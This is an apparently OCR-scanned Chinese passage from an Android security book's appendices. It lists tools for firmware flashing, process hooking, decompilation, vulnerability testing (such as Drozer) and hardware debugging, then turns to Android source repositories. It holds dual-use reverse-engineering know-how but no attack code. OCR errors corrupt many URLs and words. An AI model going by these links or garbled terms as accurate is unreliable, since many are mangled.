进行 通信 。 基 于 fastboot 通信 协议 ，fastboot 工具 可 以 对 设备 闪存 中 的 分 区 内 容 进 行 刷 人 或 清除 。 
它 也 可 以 用 来 执行 其 他 任务 ， 比 如 在 不 将 自 定 义 内 核 刷 人 设备 的 情况 下 用 该 内 核 引导 设备 。 

所 有 的 Nexus 设备 都 支持 fastboot 协议 。Android 设备 厂商 可 以 自由 选择 在 其 生产 设备 的 
bootloader 中 支持 fastboot 或 者 实现 其 独 有 的 刷 写 协议 。 

Android SDK 的 Android 平 台 工 具 包 含 了 我 们 需要 的 fastboot 命令 行 工具 。 













































































A.2.3 三 星 


许多 工具 可 以 刷 写 三 星 的 设备 。 三 星 固 件 升级 使 用 的 格式 是 *.tar.md5， 基 本 上 就 是 一 个 tar 
包 文 件 并 在 其 后 加 上 该 文件 的 md5 值 。tarmds 包 中 的 每 个 文件 分 别 对 应 设备 的 一 个 物理 分 区 。 

ODIN 

ODIN 是 三 星 设 备 在 下 载 模式 中 用 于 刷 写 和 重新 分 区 的 三 星 私 有 工具 及 相关 协议 。 在 这 种 下 
载 模式 中 ，bootloader 从 主机 的 USB 端口 接收 数据 。 虽 然 三 星 从 未 发 布 过 单独 的 Odin 工具 ,但 
该 工具 还 是 被 爱好 者 们 在 许多 互联 网 社区 中 广泛 使 用 。 通 过 这 个 工具 , 不 用 安装 完整 的 三 星 桌面 
软件 ,就 能 基于 ODIN 协议 刷 写 三 星 设备 。 这 个 软件 目前 只 适用 于 Windows, 并 且 需 要 安装 三 星 
私有 的 驱动 程序 。 

Kies 

官方 支持 的 Kies 是 用 于 三 星 设备 升级 的 桌面 软件 。 它 可 以 在 三 星 官网 上 检查 设备 更 新 ， 也 
可 以 在 刷机 之 前 将 设备 中 的 数据 同步 到 计算 机 中 。Kies 有 Windows 和 Mac OSX 版 本 ， 下 载 地 址 


征 : WWW.samsung.com/kies/。 






























































Heimdall 

Heimdall 是 一 个 在 三 星 设备 ODIN 模式 (下载 模 式 ) 下 刷 写 固件 的 开源 命令 行 工具 。 它 使 用 
了 非常 流行 的 USB 库 libusb ， 可 以 在 Linux、OS X 和 Windows 上 运行 。 下 载 地 址 是 : 
www.glassechidna.com.au/products/heimdall/。 





A.2.4 NVIDIA 


绝 大 部 分 Tegra 设备 都 有 一 个 NVIDIA 私有 恢复 模式 ， 这 种 模式 与 生产 该 设备 的 厂商 无 关 。 
在 这 种 模式 下 可 以 重新 刷 写 该 设备 。 

nvflash 

NVIDIA Tegra 设备 通常 使 用 NVIDIA 发 布 的 nvflash 工具 刷 写 ， 该 工具 可 以 在 Linux 和 
Windows 下 运行 。Tegra 设备 的 APX 模式 是 一 种 低级 诊断 和 设备 编程 模式 ,在 这 种 模式 下 可 以 通 
过 nvflash 与 设备 进行 通信 。 同 样 地 ， 在 Windows 上 使 用 APX 模式 ， 需 要 先 安装 NVIDIA 私 
有 驱动 程序 。nvflash 工具 的 下 载 地 址 是 : http://http.download.nvidia.com/tegra-public-appnotes/ 
flashing-tools.html# nvflash。 
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A.2.5 LG 


LG 设备 提供 了 一 个 紧急 下 载 模式 (Emergency Download Mode，EDM ) 用 于 刷 入 设备 固件 。 
通常 可 以 通过 一 组 取决 于 设备 的 按键 组 合 进入 这 种 模式 。 

LGBinExtractor 

LGBinExtractor 是 一 个 从 LG 的 BIN 和 TOT 格 式 固件 文件 中 提取 内 容 的 开源 命令 行 工具 。 它 
可 以 将 BIN 文件 切 分 为 其 中 各 个 分 区 的 镜像 ， 将 TOT 文件 切 分 成 多 个 块 ， 再 将 这 些 块 合 并 为 其 
中 各 个 分 区 的 镜像 ， 并 显示 分 区 表 信 息 。 这 个 工具 的 更 多 信息 位 于 : https://github.com/Xonar/ 
LGBinExtractor。 

LG Mobile Support 工具 

LG 提供 的 Mobile Support 工具 是 一 个 刷 写 LG 设备 的 私有 工具 。 它 只 能 用 于 Windows 操作 
系统 ， 并 且 同 样 需 要 安装 一 个 私有 的 LG 驱动 程序 。 更 多 相关 信息 参见 : www.lg.com/us/support/ 
mobile-support。 



























































A.2.6 HTC 


HTC 设备 中 用 于 刷机 的 私有 格式 多 种 多 样 。 最 初 ，HTC 在 一 个 签名 后 的 NBH 文件 中 包含 
原始 分 区 镜像 。 后 来 ，HTC 使 用 标准 zip 文件 来 提供 这 些 镜像 。 最 近 ，HTC 开始 为 这 些 zip 文 
件 引入 加 密 。 

unruu 

HTC 通过 一 个 名 为 ROM 更 新 工具 ( ROM Update Utility，RUU ) 的 Windows 可 执行 文件 分 
发 其 软件 更 新 。 这 个 可 执行 文件 会 将 zip 文件 提取 到 一 个 临时 目录 下 ， 将 设备 重启 至 HBOOT 模 
式 后 进行 刷 写 。 

unruu 是 一 个 简单 的 Linux 命令 行 工 具 , 用 于 从 RUU 升级 文件 中 提取 ROM 的 zip 文件 。 下 
载 地 址 是 : https://github.com/kmdm/unruu。 

ruuveal 

2012 年 , HTC 开始 用 一 个 私有 算法 对 RUU 可 执行 文件 中 的 ROM zip 文件 进行 加 密 , 不 过 用 
于 解密 zip 文件 的 密 钥 就 包含 在 设备 的 HBOOT 分 区 中 。 

ruuveal 工具 可 以 将 这 些 已 加 密 的 zip 文件 解密 出 来 ， 从 而 进一步 让 其 他 标准 的 zip 工具 所 
使 用 。 下 载 地 址 是 : https://github.com/kmdm/ruuveal。 


A.2.7 ”摩托 罗拉 


本 节 介 绍 摩托 罗拉 设备 提取 固件 和 刷机 的 常用 工具 。 

RSD Lite 

RSD Lite 是 用 于 摩托 罗拉 设备 的 私有 刷机 工具 , 在 互联 网 上 广 为 使 用 。RSD Lite 可 以 将 SBF 
(Single Binary File ) 格式 的 固件 刷 入 摩托 罗拉 设备 。 它 只 能 在 Windows 下 运行 ,并且 需要 安装 私 
有 的 摩托 罗拉 驱动 程序 。 
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sbf_flash 

sbf_flash 是 一 个 简单 的 命令 行 工具 ,完全 复制 了 RSD Lite 的 功能 ,可 以 在 Linux 和 Mac OS 
X 下 将 SBF 文件 刷 入 摩托 罗拉 设备 。 下载 地 址 是 : http://blog.opticaldelusion.org/search/label/sbf flash。 

SBF-ReCalc 

SBF-ReCalc 工具 可 以 将 摩托 罗拉 刷机 文件 切 分 为 其 中 的 各 个 独立 文件 ， 还 可 以 用 于 创建 新 
的 SBF 文件 并 重新 计算 正确 的 校 验 值 。 它 可 以 在 Windows、Linux 和 0OSX 下 运行 , 但 可 惜 的 是 ， 
似乎 已 经 不 再 有 人 维护 了 。 在 互联 网 上 可 以 搜索 到 它 。 


























A.3 Android 原生 工具 


在 Android 的 命令 行 界面 工作 时 , 研究 人 员 经 常 受 限 于 Android toolbox 工具 为 数 不 多 的 命 
令 。 本 节 介 绍 的 几 个 工具 可 以 帮助 安全 研究 人 员 更 加 便捷 地 检查 并 调试 Android 应 用 软件 。 


A.3.1 BusyBox 


BusyBox 是 一 个 二 进 制 文件 ， 提 供 了 许多 Unix 工具 的 简化 版 功能 。 它 特别 为 资源 受 限 的 系 
统 所 开发 ， 单 一 的 二 进 制 文件 可 以 更 容易 地 传输 到 设备 中 并 安装 ， 还 能 节省 磁盘 空间 和 内 存 。 

BusyBox 中 的 每 个 工具 都 可 以 通过 两 种 方法 调用 busybox 来 访问 。 最 常见 的 做 法 是 ， 对 于 
busybox 所 支持 的 每 个 工具 ， 用 其 原始 名 称 创建 一 个 到 busypox 的 符号 链接 。 有 些 版 本 的 
BusyBox 实现 了 一 个 --install 参数 来 自动 化 。 此 外 ， 还 可 以 将 这 些 工具 名 称 作 为 第 一 个 参数 
传递 给 Busybox 二 进 制 文件 来 进行 调用 。 

如 果 不 想 自己 编译 BusyBox， 可 以 通过 Google Play 市 场 免 费 下载 预 先 编译 好 的 Android 版 
本 。 更 多 信息 参见 : www.busybox.net/。 
































A.3.2 setpropex 























setpropx 是 一 个 系统 属性 编辑 器 ， 非 常 类 似 于 Android 自 带 的 setprop 工具 。 除 了 包括 
setprop 的 功能 以 外 ， 它 还 可 以 对 init 进程 进行 ptrace 来 修改 只 读 的 系统 属性 。 下 载 地 址 是 : 
https://docs.google.com/open?id=0B8LDObFOpzZqY2E1MTIyNzUtYTkzNSOOMTUwLWJmODAtZ 
TYzZGY2MDZmOTg1。 




















A.3.3 SQLite 


许多 Android 应 用 程序 使 用 SQLite 数据 库 引擎 来 管理 其 私有 的 数据 库 或 通过 content provider 
暴露 的 接口 来 存储 数据 。 因 此 ,如 果 设 备 上 有 一 个 sqlite3 二 进 制 文 件 ,以 命令 行 的 方式 访问 这 些 
数据 库 就 会 变 得 很 方便 。 这 样 ， 在 审计 一 些 使 用 了 SQLite 数据 库 的 应 用 程序 时 ， 研 究 人 员 可 以 
执行 原始 的 SQL 语句 来 检查 或 操作 数据 库 。 更 多 信息 参见 : www.sqlite.org/。 
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A.3.4 strace 
strace 是 一 个 非常 有 用 的 诊断 工具 ， 可 以 监控 和 跟踪 进程 发 起 的 系统 调用 。 它 还 可 以 显示 


该 进程 收 到 了 哪些 信号 ， 并 将 这 些 结果 保存 在 磁盘 上 。 对 原生 程序 ( 尤其 是 不 开源 的 程序 ) 进行 
快速 诊断 和 少量 调试 时 ，strace 非常 有 用 。 下 载 地 址 是 : http://sourceforge.net/projects/strace/。 


A.4 ”Hook 和 代码 改写 工具 


有 时 候 需要 查看 或 者 更 改 一 个 非 开 源 应 用 程序 的 行为 , 有 时 候 则 需要 在 它 运行 时 修改 或 者 扩 
展 其 功能 ， 跟 踪 其 执行 流 …… 对 于 hook 一 个 Android 应 用 程序 并 在 运行 时 修改 其 代码 ， 本 节 介 
绍 的 工具 为 安全 研究 人 员 提 供 了 简便 的 方法 。 









































A.4.1 ADBI 框架 














这 个 动态 二 进 制 改 写 (Dynamic Binary Instrumentation，DBI ) 框架 由 Collin Mulliner 编写 ， 
可 以 在 进程 运行 时 注入 自己 的 代码 ， 从 而 改变 其 行为 。 例 如 ， 它 包含 一 个 代码 改写 示例 ， 用 于 嗅 
探 NFC 协议 栈 进程 与 NFC 芯片 之 间 的 NFC 近 场 通信 。ADBI 框架 的 更 多 信息 参见 : 


www.mulliner.org/android/。 











A.4.2 lIdpreloadhook 


ldpreloadhook 工具 可 以 通过 LD_PRELOAD 环境 变量 对 动态 链接 的 本 地 程序 进行 函数 级 别 的 
hook。 此 外 ， 它 还 可 以 在 缓冲 区 被 释放 之 前 打印 其 中 的 内 容 , 这 在 逆向 原生 二 进 制程 序 时 尤为 有 
用 。 更 多 信息 参见 : https://github.com/poliva/ldpreloadhook。 




















A.4.3 XPosed 框架 


不 需要 修改 任何 Android 软件 安装 包 或 者 重新 刷机 ,XPosed 框架 就 可 以 在 运行 时 修改 系统 或 
应 用 程序 的 外 观 和 行为 。 

这 个 框架 通过 替换 app_process 二 进 制 文件 来 hook 进 Zygote 进程 。 它 可 以 替换 任何 类 里 的 任 
何方 法 。 此 外 ， 它 还 可 以 改变 调用 方法 时 的 参数 ， 修 改 该 方法 的 返回 值 ， 跳 过 对 该 方法 的 调用 ， 
以 及 替换 或 增加 一 些 资源 。 这 些 特点 使 其 成 为 修改 系统 运行 时 的 强大 开发 框架 , 可 以 用 于 任何 应 
用 程序 以 及 Android 框架 自身 。 更 多 信息 参见 : http://forum.xda-developers.com/showthread.php? 人 = 
1374401。 






































A.4.4 Cydia Substrate 


Cydia Substrate for Android 通过 将 Substrate 扩展 注入 目标 进程 的 内 存 ， 帮 助 开 发 者 对 已 有 的 
应 用 程序 进行 修改 。 
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Substrate 的 功能 与 XPosed 框架 非常 类 似 , 不 过 它 不 需要 替换 任何 系统 组 件 就 能 工作 。 此 外 ， 
它 可 以 将 我 们 自己 的 代码 注入 每 个 单独 的 进程 。 这 也 就 意味 着 ， 它 既 可 以 hook Dalv 站 方法 ,也 
可 以 hook 本 地 代码 。Substrate 提供 了 一 组 文档 详尽 的 核心 API, 用 于 对 C 和 Java 进程 进行 修改 。 
更 多 信息 参见 : www.cydiasubstrate.com。 


A.5 静态 分 析 工 具 


本 节 主 要 介绍 有 助 于 对 Android 应 用 程序 进行 静态 分 析 的 工具 。 由 于 Dalvik ( Android 独 有 
的 Java 虚拟 机 实现 ) 字 节 码 可 以 很 容易 地 被 翻译 为 Java 字 节 码 ,因此 这 里 介绍 的 一 些 工 具 并 不 
是 专门 为 Android 所 编写 的 。 















































A.5.1 Smali 和 Baksmali 





Smali 是 一 个 用 于 Dalvik 可 执行 文件 ( DEX ) 格式 的 汇编 圳 。Baksmali 则 是 对 应 的 Dalvik 字 
节 码 反 汇 编 器 。Smali 完整 地 支持 DEX 格式 的 所 有 功能 ， 包 括 注解 、 调 试 信息 和 代码 行 信息 等 。 

Smali 语法 由 Jasmin 和 dedexer 演化 而 来 ,Jasmin 是 Java 事实 上 的 标准 汇编 语言 格式 ,dedexer 
是 另 一 个 支持 Dalvik 操作 码 的 DEX 文件 反 汇 编 器 。 关 于 Smali 的 更 多 信息 可 以 参考 : 
https://code.google.com/p/smali/。 
























































A.5.2 Androguard 


Androguard 是 一 个 使 用 Python 编写 的 开源 逆向 工程 和 逆向 分 析 框 架 。 它 可 以 将 Android 的 二 
进 制 XML 格式 转换 成 可 读 的 XML， 还 包括 一 个 可 以 直接 将 Dalvik 字 节 人 码 反 编译 为 Java 源 代码 
的 Dalvik 反 编译 如 (DAD )。 

Androguard 可 以 反 汇编 、 反 编译 以 及 修改 DEX 文件 和 ODEX 文件 (优化 后 的 Dalvik 可 执行 
文件 )， 并 将 其 完全 转 为 Python 对 象 。 它 特意 用 模块 化 的 形式 开发 ， 便 于 集成 到 其 他 项 目 中 去 。 
它 还 可 以 操作 代码 块 、 指 令 和 权限 等 对 象 ， 进 行 静 态 代码 分 析 。 关 于 Androguard 的 更 多 信息 参 
见 : https://code.google.com/p/androguard/。 
























































A.5.3 apktool 


apktool 是 一 个 开源 的 Java 工 具 ， 用 于 对 Android 应 用 程序 进行 逆向 工程 。 它 将 APK 文件 
中 包含 的 资源 文件 解码 为 其 原始 形态 ， 即 人 类 可 读 的 XML 格式 。 它 还 使 用 Smali 将 其 中 包含 的 
所 有 类 和 方法 进行 反 汇 编 并 输出 。 

用 apktool 将 应 用 程序 解码 后 ， 可 以 在 其 输出 的 结果 上 进一步 加 工 ， 如 修改 资源 文件 或 改 
变 程序 行为 。 例 如 ， 可 以 翻译 其 中 的 资源 字符 串 ， 或 者 修改 资源 文件 以 改变 该 程序 的 主题 。 在 
Smali 代码 中 ， 可 以 增加 新 的 功能 ， 或 者 修改 已 有 功能 的 行为 。 完 成 这 些 修 改 后 ， 可 以 再 次 使 用 
apktool 从 这 些 解 码 并 修改 过 的 文件 中 构建 出 一 个 新 的 APK 文件 。 更 多 信息 参见 : https://code. 
google.com/p/android-apktool/。 
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A.5.4 dex2jar 





dex2jar 是 使 用 Java 编写 的 开源 项 目 ， 提 供 了 一 组 操作 Android DEX 文件 和 Java CLASS 
文件 的 工具 。 

使 用 aex2jar 的 主要 目的 是 将 DEX 或 ODEX 文件 转换 为 Java JAR 包 格 式 。 这 样 就 可 以 使 
用 已 有 的 任意 Java 反 编译 器 对 其 进行 反 编译 ,不 需要 这 些 反 编译 器 专门 针对 Android 字 节 码 设计 。 

dex2jar 的 其 他 特性 还 包括 在 class 文件 和 Jasmin 格式 汇编 语言 之 间 进 行 汇编 和 反 汇 编 ， 对 
DEX 文件 中 的 字符 串 进行 解密 ， 以 及 对 APK 文件 进行 签名 等 。 它 还 支持 对 包 、 类 、 方 法 和 域 的 
名 字 进 行 自动 重 命名 ; 如 果 字 节 码 是 用 ProGuard 混淆 过 的 ， 那 么 这 个 功能 尤其 有 用 。 详 细 信息 
可 以 参考 : https://code.google.com/p/dex2jar/。 






























































A.5.5 jad 


jad (Java Decompiler ) 是 一 个 用 于 Java 语 言 的 、 闭 源 的 、 不 再 维护 的 反 编 译 器 。jad 通过 命 
令 行 界面 将 CLASS 文件 转换 为 可 读 的 Java 源 代码 。 

jad 通常 和 dex2jar 一 起 使 用 , 对 没有 源 代码 的 Android 应 用 程序 进行 反 编译 。 下 载 地 址 是 ; 
http://varaneckas.com/jad/。 
























































A.5.6 JD-GUI 


JD-GUI 是 一 个 从 CLASS 文件 中 重新 构造 出 Java 源 代码 的 闭 源 Java 反 编译 器 ， 提 供 了 一 个 
图 形 化 界面 用 于 浏览 反 编译 得 到 的 源 代码 。 

JD-GUI 也 通常 与 dex2jar 结合 用 于 反 编译 Android 应 用 程序 ， 充 当 jad 的 蔡 换 工具 或 者 互 
补 工具 。JD-GUI 反 编译 的 质量 有 候 优 于 jad， 有 时 次 于 jad。 更 多 信息 参见 :。 


A.5.7 JEB 


JEB 是 一 个 闭 源 的 、 商 业 的 Dalv 站 字 节 码 反 编译 器 , 用 于 将 Android DEX 文件 转换 为 可 读 的 
Java 源 代码 。 

与 Androguard 的 反 编 译 器 DAD 类 似 , JEB 在 创建 Java 源 代码 时 不 需要 用 dex2jar 对 DEX 
文件 进行 转换 。JEB 的 主要 优势 是 ， 它 是 一 个 交互 式 的 反 编译 器 ， 可 以 用 于 检查 交叉 引用 ， 在 代 
码 和 数据 之 间 导 航 ， 并 且 通 过 交互 式 地 对 方法 、 域 、 类 和 包 名 进行 重 命名 来 处 理 ProGuard 的 混 
消 。 关 于 JEB 的 更 多 信息 可 以 参考 : www.android-decompiler.com/。 
































































































































A.5.8 Radare2 


Radare2 是 一 个 操控 二 进 制 文件 的 开源 跨 平 台 逆 向 工程 框架 。 它 由 一 个 高 度 脚 本 化 的 十 六 进 
制 编 辑 器 和 一 个 支持 多 种 后 端的 输入 输出 解析 层 构 成 ， 包 含 一 个 调试 器 、 一 个 流 分 析 器 、 一 个 
汇编 器 一 个 反 汇编 器 ,多 个 代码 分 析 模 块 一 个 二 进 制 dif 工 具 一 个 进 制 转换 器 一 个 shellcode 
开发 辅助 工具 、 一 个 二 进 制 信息 提取 工具 和 一 个 基于 块 的 哈 希 工具 。 虽 然 Radare2 是 一 个 多 目 
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的 的 通用 工具 ， 但 是 用 于 Android 逆向 工程 时 ， 对 反 汇 编 Dalvik 字 节 码 或 者 分 析 私 有 二 进 制 块 
尤为 有 用 。 
由 于 Radare2 支持 多 种 架构 和 平台 ， 可 以 在 Android 设备 或 计算 机 上 运行 它 。 下 载 地 址 是 : 


Www.Tadare.oTg/。 


























A.5.9 IDA Pro 和 Hex-Rays Decompiler 

















交互 式 反 汇编 右 ( Interactive DisAssembler，IDA ) 是 支持 多 种 二 进 制 格式 和 人 处理 避 类 型 的 私 
有 反 汇 编 器 和 调试 器 。 它 提供 了 许多 特性 ， 例 如 自动 化 代码 分 析 、 开 发 插件 的 SDK 和 分 析 脚 本 
文 持 等 。 从 6.1 版 开始 ，IDA 的 Pro 版 本 就 包含 了 一 个 Dalvik 处 理 器 模块 ， 用 于 反 汇 编 Android 
字 节 码 。 

Hex-Rays Decompiler 反 编 译 顺 是 IDA Pro 的 一 个 插件 ， 用 于 将 x86 和 ARM 可 执行 文件 的 反 
汇编 输出 结果 进一步 转换 为 人 类 可 读 的 类 C 伪 代 码 。 更 多 信息 参见 : https:/www.hex-rays.com/。 


A.6 ”应 用 程序 测试 工具 


本 节 介 绍 的 工具 和 附录 A 其 他 小 节 介 绍 的 工具 有 所 不 同 , 它们 主要 用 于 对 Android 应 用 软件 
进行 安全 测试 和 漏洞 分 析 。 













































































A.6.1 Drozer (Mercury) 框架 


Drozer ( 之 前 叫 Mercury ) 是 一 个 用 于 Android 的 漏洞 挖掘 和 利用 框架 。 它 可 以 自动 检查 
Android 应 用 软件 中 的 一 些 共性 特征 ,例如 暴露 的 activity、 暴露 的 service .暴露 的 broadcast receiver 
和 暴露 的 content provider。 此外, 它 还 可 以 测试 应 用 软件 的 其 他 一 些 缺 陷 , 例如 SQL 注入 、shared 
user ID 、 打 开 的 depuggable 标志 等 。Drozer 的 详细 信息 参见 : http:/mwrto/mmercury。 














A.6.2 iSEC Intent Sniffer 和 Intent Fuzzer 

















iSEC Intent Sniffer 和 IntentFuzzer 是 iSEC Partners 开发 的 两 款 工具 , 在 Android 设备 上 运行 ， 
协助 安全 研究 人 员 监 控 和 捕获 广播 的 intent。 它 们 通过 对 broadcast receiver 、service 和 activity 组 
件 进 行 模糊 测试 ， 发 现 其 中 的 缺陷 。 更 多 信息 参见 : https://www.isecpartners.conytools/mobile- 
Security.aSpX。 


A.7 硬件 安全 工具 


使 用 各 类 专门 的 工具 , 可 以 让 基于 接触 式 访 问 的 能 入 式 设 备 攻击 过 程 变 得 更 为 容易 。 这 些 工 
具 通常 由 定制 设备 及 其 软件 共同 组 成 ,一般 针对 特定 的 需求 而 制造 。 无 论 是 针对 Android 设备 还 
是 其 他 的 垦 入 式 设备 ， 这 些 工 具 都 会 让 你 如 虎 添 嗓 。 
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A.7.1 Segger J-Link 


Segger 的 J-Link 设备 是 一 个 中 间 层 JTAG 调试 探头 ， 可 以 用 于 操作 多 种 支持 JTAG 的 设备 。 
更 多 信息 参见 : http:/www.segger.com/debug-probes.html。 











A.7.2 JTAGulator 


在 识别 设备 上 未 知 测 试点 的 用 途 时 ，Joe Grand 的 JIAGulator 设备 可 以 节省 许多 时 间 。 只 需 
用 线 与 待 测 试点 连接 起 来 ， 它 就 能 自动 判断 出 每 一 个 针脚 的 作用 。 更 多 信息 参见 : 
http://www.grandideastudio.com/portfolio/jtagulator/。 








A.7.3 OpenOCD 


OpenOCD ( Open On-Chip Debugger ) 软件 是 一 个 面向 多 种 JTAG 设备 的 开源 解决 方案 。 有 
了 它 ， 我 们 可 以 使 用 更 便宜 的 JTAG 适配器 ， 快 速 地 将 代码 修改 为 所 需 的 样子 。 更 多 信息 参见 : 


http://openocd.sourceforge.net/。 














A.7.4 Saleae 


Saleae 的 逻辑 分 析 器 用 于 实时 监控 电子 信号 。Saleae 的 特性 包括 实时 解码 和 支持 多 种 协议 ， 
从 而 让 电路 数据 的 监控 过 程 更 加 轻松 A 有趣。 更 多 信息 参见 : http:/www.saleae.com/。 








A.7.5 Bus Pirate 


Bus Pirate 是 Dangerous Prototypes 开发 的 一 款 开源 硬件 设备 , 可 以 让 我 们 与 设备 直接 “对 话 ”。 
它 通 过 使 用 多 种 标准 协议 和 命令 行 界面 ， 实 现 了 对 芯片 的 调试 、 编 程 和 质询 。 更 多 信息 参见 ; 
http://dangerousprototypes.com/bus-pirate-manual/。 














A.7.6 GoodFET 


Travis Goodspeed 开发 的 GoodFET 是 一 款 开 源 的 flash 模拟 工具 和 JTAG 适配器 。 它 在 很 多 方 
面 都 类 似 于 Bus Pirate ， 但 是 基于 不 同 的 硬件 。 更 多 信息 参见 : http://goodfet.sourceforge.net/。 











A.7.7 Total Phase Beagle USB 


Total Phase 的 USB 分 析 仪 产品 线 可 以 帮助 我 们 监控 以 多 种 速度 经 过 USB 连接 的 数据 。 它 包 
含 了 定制 化 软件 ， 就 算 传输 的 数据 格式 是 特殊 定制 的 ,对 数据 通信 进行 解码 也 变 得 较为 容易 。 更 
多 信息 参见 : http://www.totalphase.com/protocols/usb/。 











A.7.8 Facedancer21 

















Travis Goodspeed 的 Facedancer21 是 一 款 开 源 的 硬件 设备 ， 用 于 模拟 USB 从 设备 或 USB 主 
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设备 (USB Host 模 式 )。 在 与 男 一 个 USB 设备 配对 连接 之 后 ， 可 以 用 Python 编写 模拟 代码 、 以 
任意 方式 响应 那个 设备 。 因 此 ， 可 以 用 它 对 USB 进行 模糊 测试 ， 或 者 模拟 任何 想象 得 到 的 USB 
设备 。 更 多 关于 Facedancer 的 信息 参见 : http://goodfet.sourceforge.net/hardware/facedancer21/， 可 
以 从 这 里 购买 到 已 经 组 装 好 的 硬件 : http://int3.cc/products/facedancer21。 























A.7.9 Total Phase Beagle IC 


Total Phase 的 PC 主机 适配器 产品 线 用 于 通过 PC 总 线 接口 与 外 设 进行 通信 。 它 通过 USB 接 
口 插入 主机 ， 提 供 了 定制 软件 用 于 简化 PC 通信 。 更 多 信息 参见 : http:/www.totalphase.com/ 
protocols/i2c/。 
































A.7.10 Chip Quik 

Chip Quik 焊 膏 可 以 用 于 移 除 电路 板 的 表面 贴 装 器 件 。 由 于 标准 焊锡 会 瞬间 凝固 ， 熔 点 较 高 
的 Chip Quik 焊 膏 可 以 使 焊锡 长 时 间 保 持 液 体 状态 ,从 而 便于 将 各 个 零件 拆除 出 来 .关于 Chip Quik 
的 更 多 信息 参见 : http://www.chipquikinc.com/， 所 有 电子 设备 供应 商 几 乎 均 有 销售 。 









































A.7.11 热风 枪 
一 把 电 吹 风机 。 
A.7.12 Xeltek SuperPro 


Xeltek 公司 的 SuperPro 产品 线 用 于 读 写 各 类 不 同 的 闪存 存储 。Xeltek 生产 了 多 种 适配器 , 用 
支持 许多 不 同 的 形状 系数 ， 并 且 提 供 专门 的 软件 让 这 些 读 写 操作 变 得 更 为 容易 。 关 于 Xeltek 
产品 的 更 多 信息 参见 : http://www.xeltek.com/。 














A.7.13 IDA 


Hex-Rays 公司 的 IDA 产品 让 我 们 可 以 深入 了 解 闭 源 软件 。 它 有 一 个 受 限 的 免费 版 本 和 一 个 
Pro 版 本 。Pro 版 本 支持 多 种 指令 集 和 二 进 制 文件 格式 。 可 以 从 https://www.hex-rays.conyproducts/ 
ida/index.shtml 了 解 到 更 多 IDA 的 信息 并 下 载 免 费 版 本 。 
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Android 操作 系统 的 绝 大 部 分 代码 是 开源 的 。 尽 管 这 个 系统 有 一 部 分 组 件 是 闭 源 的 ， 但 依然 
有 相当 多 的 系统 代码 以 宽松 的 开源 许可 ( BSD 或 Apache ) 或 以 对 修改 进行 开源 的 开源 许可 ( GPL ) 
发 布 。 由 于 GPL 的 限制 ， 这 个 生态 系统 中 的 许多 设备 厂商 必须 保证 将 其 对 源 代码 的 修改 公开 发 
布 出 来 。 附 录 B 主要 介绍 这 些 可 以 公开 获得 的 Android 设备 构建 源 代码 。 








B.1 谷歌 


正如 第 1 章 所 述 ， 谷 歌 是 Android 系统 的 发 起 者 。 谷 歌 秘密 地 开发 Android 新 版 本 ， 然 后 在 
该 版 本 发 布 时 将 代码 贡献 到 AOSP ( Android Open Source Project )。 谷 歌 提 供 了 许多 文档 来 说 明 如 
何 访问 这 些 代 码 ， 不 过 为 了 方便 读者 ， 本 书 再 次 进行 介绍 。 








B1.1. AOSP 


AOSP 由 许多 Git 仓库 构成 ， 这 些 仓库 包括 Android 系统 中 所 有 开源 的 代码 。 这 里 简直 就 是 
“贩卖 ”Android 中 所 有 东西 的 大 超市 ， 也 是 OEM 构建 固件 镜像 的 上 游 起 点 。 除 了 各 类 运行 时 组 
件 的 源 代码 ，AOSP 还 提供 了 一 个 完整 的 构建 环境 ， 以 及 NDK 和 SDK 的 源 代码 ， 等 等 。 我 们 其 
至 可 以 从 AOSP 中 编译 出 完整 的 Nexus 设备 镜像 文件 ， 不 过 其 中 几 个 组 件 仅 以 二 进 制 形式 提供 。 

每 个 Android 设备 都 有 两 块 主要 的 组 件 : 平台 (platform ) 和 内 核 ( kernel )。 对 Nexus 设备 
而 言 ， 这 两 块 组 件 都 已 经 被 完整 地 包含 在 AOSP 中 了 。AOSP 仓库 曾经 和 Linux 内 核 源 代码 存放 
在 一 起 ， 现 在 则 改 为 存放 在 谷歌 自己 的 服务 器 上 ，URL 是 : https://android.googlesource.com/。 

AOSP 使 用 一 个 名 为 repo 的 专门 工具 来 组 织 和 管理 这 些 Git 仓库 。 在 谷歌 的 官方 文档 中 ， 可 
以 找到 这 个 工具 的 使 用 方法 并 下 载 完整 的 源 代码 : http://source.android.com/source/downloading. 
html。 

除了 将 整个 AOSP 代码 库 或 其 中 部 分 代码 下 载 到 本 地 ， 和 谷歌 还 通过 Google Code 站 点 提供 了 
一 个 源 代码 浏览 工具 : https://code.google.com/p/android-source-browsing/。 

第 10 章 已 经 介绍 ， 内 核 的 源 代 码 仓库 是 根据 其 支持 的 系统 芯片 (System-on-Chip，SocC ) 来 
划分 的 。 这 些 SoC 包括 德州 仪器 TI 的 OMAP、 高 通 的 MSM、 三 星 的 Exynos、Nvidia 的 Tegra 
以 及 模拟 器 ( goldfish )。 这 些 仓库 的 上 游 源 代码 由 各 个 SoC 厂商 自己 维护 ,不 过 谷歌 还 存储 了 用 
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于 Nexus 设备 的 官方 仓库 。 


B.1.2 ”Gerrit 源 代 码 审计 

除了 源 代码 仓库 和 源 代 码 浏览 器 ， 谷 歌 还 提供 一 个 名 为 Gerrit 的 源 代码 审计 系统 。 通 过 这 个 
系统 ,谷歌 之 外 的 贡献 者 可 以 提交 各 类 补丁 。 通 过 时 刻 关注 这 个 仓库 , 研究 人 员 可 以 在 AOSP 源 
代码 的 可 能 变化 正式 提交 之 前 看 到 其 修改 .Gerrit 源 代 码 审计 系统 的 地 址 是 :https:/android-review. 


googlesource.comy/。 






































B.2 SoC 厂商 


在 Android 生态 系统 中 ，SoC 厂商 负责 开发 板 级 支持 包 (Board Support Package，BSP )。 这 
些 BSP 主要 是 指 对 上 游 项 目 进行 修改 移植 ， 使 其 在 SoC 厂商 生产 的 硬件 上 正常 工作 。 

每 个 广 商 都 会 维护 自己 的 源 代 码 仓库 ,至 于 要 不 要 将 开发 过 程 全 部 开源 , 则 完全 取决 于 厂商 
自己 。 许 多 厂商 提供 了 开源 仓库 ， 也 有 些 没有 这 样 做 。BSP 的 主要 开源 组 件 是 Linux 内 核 。 由 于 
GPL 的 条 款 约 束 ， 这 些 企 业 在 法 律 上 被 要 求 以 某 种 形式 公开 提供 它们 对 内 核 所 作 的 修改 。 

接 下 来 简单 介绍 一 些 顶 级 SoC 厂商 。 


























B.2.1 全 志 





全 志 SoC 是 位 于 广东 的 全 志 科 技 (AllWinner Technology ) 开发 的 ARM 处 理 器 。 这 些 SoC 
